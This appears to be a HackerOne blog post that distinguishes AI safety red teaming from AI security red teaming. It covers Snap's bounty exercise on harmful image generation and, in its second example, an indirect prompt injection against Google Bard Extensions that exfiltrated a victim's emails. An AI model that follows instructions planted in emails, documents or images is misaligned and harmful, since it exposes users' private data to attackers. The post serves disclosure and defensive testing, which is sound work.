AI Safety vs. AI Security [2 Types of AI Red Teaming]

Dane Sherrets

Senior Solutions Architect

March 14th, 2024

While the terminology is similar, AI safety and AI security are distinct disciplines, and as GenAI deployments accelerate, it’s important to understand the differences and how to test for each.

What Is the Difference Between Red Teaming For AI Safety and AI Security?

AI red teaming is a form of AI testing to find flaws and vulnerabilities, and the method can be used for both AI safety and AI security exercises. However, the execution and goals differ from one to the other.

AI red teaming for safety issues focuses on preventing AI systems from generating harmful content, such as providing instructions on creating bombs or producing offensive language. It aims to ensure responsible use of AI and adherence to ethical standards.

On the other hand, red teaming exercises for AI security involve testing AI systems with the goal of preventing bad actors from abusing the AI to, for example, compromise the confidentiality, integrity, or availability of the systems the AI is embedded in.

AI Safety Example: Snap, Inc.

Snap Inc. has been an early adopter of AI safety red teaming and has partnered with HackerOne to test the strict safeguards it has in place around this new technology. Together, we have made significant developments in the methodology for AI safety red teaming that have led to a more effective approach to surfacing previously unknown problems.

Snap uses image-generating AI models within the backend of its program. The Safety team had already identified eight categories of harmful imagery they wanted to test for, including violence, sex, self-harm, and eating disorders.

"We knew we wanted to do adversarial testing on the product, and a security expert on our team suggested a bug bounty-style program. From there, we devised the idea to use a 'Capture the Flag' (CTF) style exercise that would incentivize researchers to look for our specific areas of concern. Capture the Flag exercises are a common cybersecurity exercise, and a CTF was used to test large language models (LLMs) at DEFCON. We hadn't seen this applied to testing text-to-image models but thought it could be effective."
— Ilana Arbisser, Technical Lead, AI Safety at Snap Inc.

By setting bounties, we incentivized our community to test the product and to focus on the content Snap was most concerned about being generated on its platform. Snap and HackerOne adjusted bounties dynamically and continued to experiment with prices to optimize for researcher engagement. The exercise gave Snap a process for testing its filters and generated data that can be used to further evaluate the model. We anticipate that the research and subsequent findings will help create benchmarks and standards, so that other social media companies can use the same flags to test for content.
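To make the idea of "flags" and evaluation data concrete, here is a minimal sketch of how submissions from a CTF-style exercise might be tallied per harm category. It is illustrative only: the `Submission` record and the `confirmed_flags` and `bypass_rate` helpers are hypothetical names, not Snap's or HackerOne's actual tooling, and the sample categories are limited to the four named above.

```python
from collections import Counter
from dataclasses import dataclass


# Hypothetical record of one researcher submission in a CTF-style exercise.
@dataclass(frozen=True)
class Submission:
    category: str   # harm category the prompt targeted
    prompt_id: str  # opaque identifier, not the prompt text itself
    bypassed: bool  # True if reviewers confirmed the output got past the filter


def confirmed_flags(submissions):
    """Count confirmed filter bypasses per category."""
    return Counter(s.category for s in submissions if s.bypassed)


def bypass_rate(submissions, category):
    """Fraction of submissions in a category that bypassed the filter."""
    in_category = [s for s in submissions if s.category == category]
    if not in_category:
        return 0.0
    return sum(s.bypassed for s in in_category) / len(in_category)


if __name__ == "__main__":
    # Made-up sample data, for illustration only.
    sample = [
        Submission("violence", "p-001", True),
        Submission("violence", "p-002", False),
        Submission("self-harm", "p-003", False),
        Submission("eating disorders", "p-004", True),
    ]
    print(confirmed_flags(sample))
    print(bypass_rate(sample, "violence"))
```

A per-category tally like this is one plausible way to compare filter performance across categories over time; a real program would also need reviewer notes and severity information.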

AI Security Example: Google Bard

In a red teaming exercise for AI security, hackers Joseph "rez0" Thacker, Justin "Rhynorater" Gardner, and Roni "Lupin" Carta collaborated to hack Google's GenAI assistant, Bard.

The launch of Bard’s Extensions AI feature gave Bard access to Google Drive, Google Docs, and Gmail. This meant Bard would have access to Personally Identifiable Information (PII) and could even read emails, Drive documents, and locations. The hackers identified that Bard analyzes untrusted data and could therefore be susceptible to Indirect Prompt Injection, which can be delivered to users without their consent.

In less than 24 hours from the launch of Bard Extensions, the hackers were able to demonstrate that:

Google Bard is vulnerable to Indirect Prompt Injection via data from Extensions.
Malicious image Prompt Injection instructions will exploit the vulnerability.
When writing the exploit, the hackers developed a prompt injection payload that would exfiltrate the victim’s emails.
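The findings above suggest one defensive layer: treating the model's output as untrusted before rendering it. The sketch below assumes the exfiltration channel is a Markdown image whose URL carries the stolen data and is fetched automatically by the chat client. The article does not spell out the payload, so that channel, the `ALLOWED_IMAGE_HOSTS` allowlist, and the `strip_untrusted_images` helper are all assumptions made for illustration, not Google's actual fix.

```python
import re
from urllib.parse import urlparse

# Hypothetical allowlist of hosts the chat UI is permitted to load images from.
ALLOWED_IMAGE_HOSTS = {"images.example.com"}

# Matches Markdown images of the form ![alt](url) or ![alt](url "title").
MARKDOWN_IMAGE = re.compile(r"!\[([^\]]*)\]\(\s*([^)\s]+)[^)]*\)")


def strip_untrusted_images(model_output: str) -> str:
    """Replace Markdown images on non-allowlisted hosts with a text placeholder."""

    def _replace(match: re.Match) -> str:
        alt, url = match.group(1), match.group(2)
        host = urlparse(url).hostname or ""  # relative URLs have no hostname
        if host in ALLOWED_IMAGE_HOSTS:
            return match.group(0)  # keep trusted images unchanged
        return f"[image removed: {alt}]"

    return MARKDOWN_IMAGE.sub(_replace, model_output)


if __name__ == "__main__":
    # Output a model might produce after reading an injected document (made up).
    risky = "Summary done. ![x](https://attacker.example/log?d=secret)"
    print(strip_untrusted_images(risky))
```

Output filtering of this kind narrows one exfiltration path but does not stop the injection itself; it would sit alongside other controls, such as limiting what data an extension can read.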

[Figure: Indirect prompt injection in Google Bard]

With such a powerful impact as the exfiltration of personal emails, the hackers promptly reported this vulnerability to Google, which resulted in a $20,000 bounty.

Bugs like this only scratch the surface of the security vulnerabilities found in GenAI. Organizations developing and deploying GenAI and LLMs need security talent that specializes in the OWASP Top 10 for LLMs if they are serious about introducing these technologies competitively and securely.

AI Red Teaming for Safety and Security With HackerOne

By using the expertise of ethical hackers and adapting the bug bounty model to address AI safety and security, HackerOne's playbook for AI Red Teaming is a proactive approach to fortifying AI while mitigating potential risks. For technology and security leaders venturing into AI integration, we look forward to partnering with you to explore how HackerOne and ethical hackers can contribute to your AI safety journey. To learn more about how to implement AI Red Teaming for your organization, contact our experts at HackerOne.
